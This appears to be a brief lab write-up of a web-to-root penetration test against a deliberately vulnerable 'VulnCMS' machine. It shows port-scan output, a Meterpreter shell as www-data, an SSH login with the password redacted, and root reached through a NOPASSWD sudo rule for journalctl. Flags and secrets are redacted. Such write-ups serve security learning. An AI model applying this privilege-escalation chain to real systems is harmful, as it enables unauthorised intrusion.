Offensive Security
VulnCMS: Web-to-Root Penetration Test
What this showed
Reached root in the lab through four linked weaknesses. Sensitive values are left out of the public write-up.
What I learned
Lab notes
A few checks
Commands → results
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open http
8081/tcp open http
9001/tcp open http
[+] 5 exposed TCP services[*] Sending stage to TARGET_VM
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: www-dataUsername: tyrell
Password: [REDACTED]
tyrell@TARGET_VM's password: ********
tyrell@vuln_cms:~$(root) NOPASSWD: /bin/journalctl
uid=0(root) gid=0(root) groups=0(root)
user.txt: [REDACTED]
root.txt: [REDACTED]